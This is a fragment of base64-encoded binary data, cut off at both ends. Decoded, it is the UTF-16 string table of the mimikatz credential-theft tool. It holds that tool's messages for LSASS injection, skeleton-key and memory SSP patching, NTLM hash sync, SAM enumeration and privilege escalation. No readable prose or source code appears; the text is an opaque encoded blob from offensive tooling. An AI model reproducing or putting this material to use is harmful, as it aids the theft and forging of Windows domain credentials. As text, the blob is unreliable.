QAUwBlAHIAdgBlAHIAUgBlAHEAQwBoAGEAbABsAGUAbgBnAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAG4AZQB0AHMAeQBuAGMAIAA7ACAAbgB0AGwAbQAgAGgAYQBzAGgALwByAGMANAAgAGsAZQB5ACAAbABlAG4AZwB0AGgAIABtAHUAcwB0ACAAYgBlACAAMwAyACAAKAAxADYAIABiAHkAdABlAHMAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBuAGUAdABzAHkAbgBjACAAOwAgAE0AaQBzAHMAaQBuAGcAIABhAHIAZwB1AG0AZQBuAHQAIAA6ACAAbgB0AGwAbQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AbgBlAHQAcwB5AG4AYwAgADsAIABNAGkAcwBzAGkAbgBnACAAYQByAGcAdQBtAGUAbgB0ACAAOgAgAHUAcwBlAHIACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAG4AZQB0AHMAeQBuAGMAIAA7ACAATQBpAHMAcwBpAG4AZwAgAGEAcgBnAHUAbQBlAG4AdAAgADoAIABkAGMACgAAAGMAbQBkAAAAAAAAAEMAbwBtAG0AYQBuAGQAIABQAHIAbwBtAHAAdAAgACAAIAAgACAAIAAgACAAIAAgACgAdwBpAHQAaABvAHUAdAAgAEQAaQBzAGEAYgBsAGUAQwBNAEQAKQAAAAAAcgBlAGcAZQBkAGkAdAAAAAAAAABSAGUAZwBpAHMAdAByAHkAIABFAGQAaQB0AG8AcgAgACAAIAAgACAAIAAgACAAIAAoAHcAaQB0AGgAbwB1AHQAIABEAGkAcwBhAGIAbABlAFIAZQBnAGkAcwB0AHIAeQBUAG8AbwBsAHMAKQAAAAAAdABhAHMAawBtAGcAcgAAAFQAYQBzAGsAIABNAGEAbgBhAGcAZQByACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAdwBpAHQAaABvAHUAdAAgAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgApAAAAAABuAGMAcgBvAHUAdABlAG0AbwBuAAAAAAAAAAAASgB1AG4AaQBwAGUAcgAgAE4AZQB0AHcAbwByAGsAIABDAG8AbgBuAGUAYwB0ACAAKAB3AGkAdABoAG8AdQB0ACAAcgBvAHUAdABlACAAbQBvAG4AaQB0AG8AcgBpAG4AZwApAAAAAABkAGUAdABvAHUAcgBzAAAAWwBlAHgAcABlAHIAaQBtAGUAbgB0AGEAbABdACAAVAByAHkAIAB0AG8AIABlAG4AdQBtAGUAcgBhAHQAZQAgAGEAbABsACAAbQBvAGQAdQBsAGUAcwAgAHcAaQB0AGgAIABEAGUAdABvAHUAcgBzAC0AbABpAGsAZQAgAGgAbwBvAGsAcwAAAG0AZQBtAHMAcwBwAAAAAABzAGsAZQBsAGUAdABvAG4AAAAAAGMAbwBtAHAAcgBlAHMAcwBtAGUAAAAAAG0AaQBzAGMAAAAAAE0AaQBzAGMAZQBsAGwAYQBuAGUAbwB1AHMAIABtAG8AZAB1AGwAZQAAAAAASwBpAHcAaQBBAG4AZABDAE0ARAAAAAAARABpAHMAYQBiAGwAZQBDAE0ARAAAAAAAYwBtAGQALgBlAHgAZQAAAEsAaQB3AGkAQQBuAGQAUgBlAGcAaQBzAHQAcgB5AFQAbwBvAGwAcwAAAAAARABpAHMAYQBiAGwAZQBSAGUAZwBpAHMAdAByAHkAVABvAG8AbABzAAAAAAByAGUAZwBlAGQAaQB0AC4AZQB4AGUAAABLAGkAdwBpAEEAbgBkAFQAYQBzAGsATQBnAHIAAAAAAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAAAAAAdABhAHMAawBtAGcAcgAuAGUAeABlAAAAZABzAE4AYwBTAGUAcgB2AGkAYwBlAAAACQAoACUAdwBaACkAAAAAAAkAWwAlAHUAXQAgACUAdwBaACAAIQAgAAAAAAAlAC0AMwAyAFMAAAAjACAAJQB1AAAAAAAJACAAJQBwACAALQA+ACAAJQBwAAAAAAAlAHcAWgAgACgAJQB1ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBkAGUAdABvAHUAcgBzAF8AYwBhAGwAbABiAGEAYwBrAF8AcAByAG8AYwBlAHMAcwAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAUABhAHQAYwBoACAATwBLACAAZgBvAHIAIAAnACUAcwAnACAAZgByAG8AbQAgACcAJQBzACcAIAB0AG8AIAAnACUAcwAnACAAQAAgACUAcAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGcAZQBuAGUAcgBpAGMAXwBuAG8AZwBwAG8AXwBwAGEAdABjAGgAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAbQBzAHYAYwByAHQALgBkAGwAbAAAAAAAZm9wZW4AAABmd3ByaW50ZgAAAABmY2xvc2UAAGwAcwBhAHMAcwAuAGUAeABlAAAAbQBzAHYAMQBfADAALgBkAGwAbAAAAAAASQBuAGoAZQBjAHQAZQBkACAAPQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBtAGUAbQBzAHMAcAAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AYwBvAHAAeQAgAC0AIABUAHIAYQBtAHAAbwBsAGkAbgBlACAAbgAwACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBtAGUAbQBzAHMAcAAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAVAByAGEAbQBwAG8AbABpAG4AZQAgAG4AMQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAtACAAcgBlAGEAbAAgAGEAcwBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBzAGUAYQByAGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAG0AZQBtAHMAcwBwACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AbQBlAG0AcwBzAHAAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAUAByAG8AYwBlAHMAcwBJAGQARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAATG9jYWxBbGxvYwAAbABlAHQAYQBlAHMAAAAAAGsAZABjAHMAdgBjAC4AZABsAGwAAAAAAFsASwBEAEMAXQAgAGQAYQB0AGEACgAAAFsASwBEAEMAXQAgAHMAdAByAHUAYwB0AAoAAABbAEsARABDAF0AIABrAGUAeQBzACAAcABhAHQAYwBoACAATwBLAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAAUwBlAGMAbwBuAGQAIABwAGEAdAB0AGUAcgBuACAAbgBvAHQAIABmAG8AdQBuAGQACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAEYAaQByAHMAdAAgAHAAYQB0AHQAZQByAG4AIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAHMAawBlAGwAZQB0AG8AbgAgADsAIABrAHUAbABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAdABWAGUAcgB5AEIAYQBzAGkAYwBNAG8AZAB1AGwAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AcwBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAABjAHIAeQBwAHQAZABsAGwALgBkAGwAbAAAAAAAWwBSAEMANABdACAAZgB1AG4AYwB0AGkAbwBuAHMACgAAAAAAWwBSAEMANABdACAAaQBuAGkAdAAgAHAAYQB0AGMAaAAgAE8ASwAKAAAAAABbAFIAQwA0AF0AIABkAGUAYwByAHkAcAB0ACAAcABhAHQAYwBoACAATwBLAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBtAGkAcwBjAF8AcwBrAGUAbABlAHQAbwBuACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAYwByAGUAYQB0AGUAIAByAGUAbQBvAHQAZQAgAGYAdQBuAGMAdABpAG8AbgBzAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG0AaQBzAGMAXwBzAGsAZQBsAGUAdABvAG4AIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFUAcwBpAG4AZwAgACcAJQBzACcAIABhAHMAIABpAG4AcAB1AHQAIABmAGkAbABlAAoAAAAgACoAIABPAHIAaQBnAGkAbgBhAGwAIABzAGkAegBlACAAIAA6ACAAJQB1AAoAAABtAGkAbQBpAGsAYQB0AHoAXwB4ADgANgAuAGMAbwBtAHAAcgBlAHMAcwBlAGQAAAAAAAAAIAAqACAAQwBvAG0AcAByAGUAcwBzAGUAZAAgAHMAaQB6AGUAOgAgACUAdQAgACgAJQAuADIAZgAlACUAKQAKAFUAcwBpAG4AZwAgACcAJQBzACcAIABhAHMAIABvAHUAdABwAHUAdAAgAGYAaQBsAGUALgAuAC4AIAAAAE8ASwAhAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbQBpAHMAYwBfAGMAbwBtAHAAcgBlAHMAcwBtAGUAIAA7ACAAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAZwByAG8AdQBwAAAAYQBsAGkAYQBzAAAAbgBlAHQAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBPAHAAZQBuAEQAbwBtAGEAaQBuACAAQgB1AGkAbAB0AGkAbgAgACgAPwApACAAJQAwADgAeAAKAAAACgBEAG8AbQBhAGkAbgAgAG4AYQBtAGUAIAA6ACAAJQB3AFoAAAAAAAoARABvAG0AYQBpAG4AIABTAEkARAAgACAAOgAgAAAACgAgACUALQA1AHUAIAAlAHcAWgAAAAAACgAgAHwAIAAlAC0ANQB1ACAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ARwBlAHQARwByAG8AdQBwAHMARgBvAHIAVQBzAGUAcgAgACUAMAA4AHgAAAAAAAoAIAB8AGAAJQAtADUAdQAgAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ARwBlAHQAQQBsAGkAYQBzAE0AZQBtAGIAZQByAHMAaABpAHAAIAAlADAAOAB4AAAAAAAKACAAfAC0ACUALQA1AHUAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBSAGkAZABUAG8AUwBpAGQAIAAlADAAOAB4AAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATwBwAGUAbgBVAHMAZQByACAAJQAwADgAeAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAFUAcwBlAHIAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AdQBzAGUAcgAgADsAIABTAGEAbQBPAHAAZQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0ATABvAG8AawB1AHAARABvAG0AYQBpAG4ASQBuAFMAYQBtAFMAZQByAHYAZQByACAAJQAwADgAeAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwB1AHMAZQByACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAEQAbwBtAGEAaQBuAHMASQBuAFMAYQBtAFMAZQByAHYAZQByACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHUAcwBlAHIAIAA7ACAAUwBhAG0AQwBvAG4AbgBlAGMAdAAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBnAHIAbwB1AHAAIAA7ACAAUwBhAG0ARwBlAHQATQBlAG0AYgBlAHIAcwBJAG4AQQBsAGkAYQBzACAAJQAwADgAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGcAcgBvAHUAcAAgADsAIABTAGEAbQBPAHAAZQBuAEcAcgBvAHUAcAAgACUAMAA4AHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBnAHIAbwB1AHAAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUARwByAG8AdQBwAHMASQBuAEQAbwBtAGEAaQBuACAAJQAwADgAeAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBnAHIAbwB1AHAAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AZwByAG8AdQBwACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AZwByAG8AdQBwACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAEQAbwBtAGEAaQBuAHMASQBuAFMAYQBtAFMAZQByAHYAZQByACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBnAHIAbwB1AHAAIAA7ACAAUwBhAG0AQwBvAG4AbgBlAGMAdAAgACUAMAA4AHgACgAAAAoAIAB8ACAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ARwBlAHQATQBlAG0AYgBlAHIAcwBJAG4AQQBsAGkAYQBzACAAJQAwADgAeAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAGEAbABpAGEAcwAgADsAIABTAGEAbQBPAHAAZQBuAEEAbABpAGEAcwAgACUAMAA4AHgAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ARQBuAHUAbQBlAHIAYQB0AGUAQQBsAGkAYQBzAGUAcwBJAG4ARABvAG0AYQBpAG4AIAAlADAAOAB4AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0ATwBwAGUAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AYQBsAGkAYQBzACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEQAbwBtAGEAaQBuAEkAbgBTAGEAbQBTAGUAcgB2AGUAcgAgACUAMAA4AHgAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAG4AZQB0AF8AYQBsAGkAYQBzACAAOwAgAFMAYQBtAEUAbgB1AG0AZQByAGEAdABlAEQAbwBtAGEAaQBuAHMASQBuAFMAYQBtAFMAZQByAHYAZQByACAAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbgBlAHQAXwBhAGwAaQBhAHMAIAA7ACAAUwBhAG0AQwBvAG4AbgBlAGMAdAAgACUAMAA4AHgACgAAACUAdwBaAAkAKAAlAHMAKQAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBuAGUAdABfAHMAaQBtAHAAbABlAEwAbwBvAGsAdQBwACAAOwAgAFMAYQBtAEwAbwBvAGsAdQBwAEkAZABzAEkAbgBEAG8AbQBhAGkAbgAgACUAMAA4AHgAAABkAGUAYgB1AGcAAABBAHMAawAgAGQAZQBiAHUAZwAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAZAByAGkAdgBlAHIAAAAAAEEAcwBrACAAbABvAGEAZAAgAGQAcgBpAHYAZQByACAAcAByAGkAdgBpAGwAZQBnAGUAAABBAHMAawAgAHMAZQBjAHUAcgBpAHQAeQAgAHAAcgBpAHYAaQBsAGUAZwBlAAAAAAB0AGMAYgAAAEEAcwBrACAAdABjAGIAIABwAHIAaQB2AGkAbABlAGcAZQAAAGIAYQBjAGsAdQBwAAAAAABBAHMAawAgAGIAYQBjAGsAdQBwACAAcAByAGkAdgBpAGwAZQBnAGUAAAAAAHIAZQBzAHQAbwByAGUAAABBAHMAawAgAHIAZQBzAHQAbwByAGUAIABwAHIAaQB2AGkAbABlAGcAZQAAAHMAeQBzAGUAbgB2AAAAAABBAHMAawAgAHMAeQBzAHQAZQBtACAAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAcAByAGkAdgBpAGwAZQBnAGUAAAAAAEEAcwBrACAAYQAgAHAAcgBpAHYAaQBsAGUAZwBlACAAYgB5ACAAaQB0AHMAIABpAGQAAABBAHMAawAgAGEAIABwAHIAaQB2AGkAbABlAGcAZQAgAGIAeQAgAGkAdABzACAAbgBhAG0AZQAAAHAAcgBpAHYAaQBsAGUAZwBlAAAAUAByAGkAdgBpAGwAZQBnAGUAIABtAG8AZAB1AGwAZQAAAAAAUAByAGkAdgBpAGwAZQBnAGUAIAAnACUAdQAnACAATwBLAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAGkAdgBpAGwAZQBnAGUAXwBzAGkAbQBwAGwAZQAgADsAIABSAHQAbABBAGQAagB1AHMAdABQAHIAaQB2AGkAbABlAGcAZQAgACgAJQB1ACkAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAGkAZAAgADsAIABNAGkAcwBzAGkAbgBnACAAJwBpAGQAJwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAGkAdgBpAGwAZQBnAGUAXwBuAGEAbQBlACAAOwAgAEwAVQBJAEQAIABoAGkAZwBoACAAcABhAHIAdAAgAGkAcwAgACUAdQAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAaQB2AGkAbABlAGcAZQBfAG4AYQBtAGUAIAA7ACAATABvAG8AawB1AHAAUAByAGkAdgBpAGwAZQBnAGUAVgBhAGwAdQBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBpAHYAaQBsAGUAZwBlAF8AbgBhAG0AZQAgADsAIABNAGkAcwBzAGkAbgBnACAAJwBuAGEAbQBlACcACgAAAGUAeABwAG8AcgB0AHMAAABMAGkAcwB0ACAAZQB4AHAAbwByAHQAcwAAAAAAaQBtAHAAbwByAHQAcwAAAEwAaQBzAHQAIABpAG0AcABvAHIAdABzAAAAAABzAHQAYQByAHQAAABTAHQAYQByAHQAIABhACAAcAByAG8AYwBlAHMAcwAAAHMAdABvAHAAAAAAAFQAZQByAG0AaQBuAGEAdABlACAAYQAgAHAAcgBvAGMAZQBzAHMAAABzAHUAcwBwAGUAbgBkAAAAUwB1AHMAcABlAG4AZAAgAGEAIABwAHIAbwBjAGUAcwBzAAAAcgBlAHMAdQBtAGUAAAAAAFIAZQBzAHUAbQBlACAAYQAgAHAAcgBvAGMAZQBzAHMAAAAAAFAAcgBvAGMAZQBzAHMAIABtAG8AZAB1AGwAZQAAAAAAVAByAHkAaQBuAGcAIAB0AG8AIABzAHQAYQByAHQAIAAiACUAcwAiACAAOgAgAAAATwBLACAAIQAgACgAUABJAEQAIAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AcwB0AGEAcgB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGMAcgBlAGEAdABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAE4AdABUAGUAcgBtAGkAbgBhAHQAZQBQAHIAbwBjAGUAcwBzAAAAAABOAHQAUwB1AHMAcABlAG4AZABQAHIAbwBjAGUAcwBzAAAAAABOAHQAUgBlAHMAdQBtAGUAUAByAG8AYwBlAHMAcwAAACUAcwAgAG8AZgAgACUAdQAgAFAASQBEACAAOgAgAE8ASwAgACEACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQBuAGUAcgBpAGMATwBwAGUAcgBhAHQAaQBvAG4AIAA7ACAAJQBzACAAMAB4ACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAG4AZQByAGkAYwBPAHAAZQByAGEAdABpAG8AbgAgADsAIABPAHAAZQBuAFAAcgBvAGMAZQBzAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBnAGUAbgBlAHIAaQBjAE8AcABlAHIAYQB0AGkAbwBuACAAOwAgAHAAaQBkACAAKAAvAHAAaQBkADoAMQAyADMAKQAgAGkAcwAgAG0AaQBzAHMAaQBuAGcAAAAlAHUACQAlAHcAWgAAAAAAIAAoAAAAAAApAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AYwBhAGwAbABiAGEAYwBrAFAAcgBvAGMAZQBzAHMAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAHAAcgBvAGMAZQBzAHMAXwBjAGEAbABsAGIAYQBjAGsAUAByAG8AYwBlAHMAcwAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AbwBwAGUAbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAACgAlAHcAWgAAAAAACgAJACUAcAAgAC0APgAgACUAdQAAAAAACQAlAHUAAAAJACAAAAAAAAkAJQBwAAAACQAlAFMAAAAJAC0APgAgACUAUwAAAAAACgAJACUAcAAgAC0APgAgACUAcAAJACUAUwAgACEAIAAAAAAAJQBTAAAAAAAjACUAdQAAAFMAdABhAHIAdAAgAHMAZQByAHYAaQBjAGUAAABSAGUAbQBvAHYAZQAgAHMAZQByAHYAaQBjAGUAAAAAAFMAdABvAHAAIABzAGUAcgB2AGkAYwBlAAAAAABTAHUAcwBwAGUAbgBkACAAcwBlAHIAdgBpAGMAZQAAAFIAZQBzAHUAbQBlACAAcwBlAHIAdgBpAGMAZQAAAAAAcAByAGUAcwBoAHUAdABkAG8AdwBuAAAAUAByAGUAcwBoAHUAdABkAG8AdwBuACAAcwBlAHIAdgBpAGMAZQAAAHMAaAB1AHQAZABvAHcAbgAAAAAAUwBoAHUAdABkAG8AdwBuACAAcwBlAHIAdgBpAGMAZQAAAAAATABpAHMAdAAgAHMAZQByAHYAaQBjAGUAcwAAAFMAZQByAHYAaQBjAGUAIABtAG8AZAB1AGwAZQAAAAAAJQBzACAAJwAlAHMAJwAgAHMAZQByAHYAaQBjAGUAIAA6ACAAAAAAAAAAAABFAFIAUgBPAFIAIABnAGUAbgBlAHIAaQBjAEYAdQBuAGMAdABpAG8AbgAgADsAIABTAGUAcgB2AGkAYwBlACAAbwBwAGUAcgBhAHQAaQBvAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAEkAbgBqAGUAYwB0ACAAbgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAKAAAAAAAAAEUAUgBSAE8AUgAgAGcAZQBuAGUAcgBpAGMARgB1AG4AYwB0AGkAbwBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABzAGUAcgB2AGkAYwBlACAAbgBhAG0AZQAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAABTAHQAYQByAHQAaQBuAGcAAAAAAFIAZQBtAG8AdgBpAG4AZwAAAAAAUwB0AG8AcABwAGkAbgBnAAAAAABTAHUAcwBwAGUAbgBkAGkAbgBnAAAAAABSAGUAcwB1AG0AaQBuAGcAAAAAAFAAcgBlAHMAaAB1AHQAZABvAHcAbgAAAFMAaAB1AHQAZABvAHcAbgAAAAAAcwBlAHIAdgBpAGMAZQBzAC4AZQB4AGUAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAHMAZQBhAHIAYwBoACAAKAAwAHgAJQAwADgAeAApAAoAAABlAHIAcgBvAHIAIAAlAHUACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBzAGUAcgB2AGkAYwBlAF8AcwBlAG4AZABjAG8AbgB0AHIAbwBsAF8AaQBuAHAAcgBvAGMAZQBzAHMAIAA7ACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAgAHcAaQB0AGgAbwB1AHQAIABTAGMAUwBlAG4AZABDAG8AbgB0AHIAbwBsAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AcwBlAHIAdgBpAGMAZQBfAHMAZQBuAGQAYwBvAG4AdAByAG8AbABfAGkAbgBwAHIAbwBjAGUAcwBzACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABsAG8AbwBrAHUAcAAAAAAATgBhAG0AZQAgAG8AcgAgAFMASQBEACAAbABvAG8AawB1AHAAAAAAAHEAdQBlAHIAeQAAAFEAdQBlAHIAeQAgAG8AYgBqAGUAYwB0ACAAYgB5ACAAUwBJAEQAIABvAHIAIABuAGEAbQBlAAAAUwBlAGMAdQByAGkAdAB5ACAASQBkAGUAbgB0AGkAZgBpAGUAcgBzACAAbQBvAGQAdQBsAGUAAABTAEkARAAgAC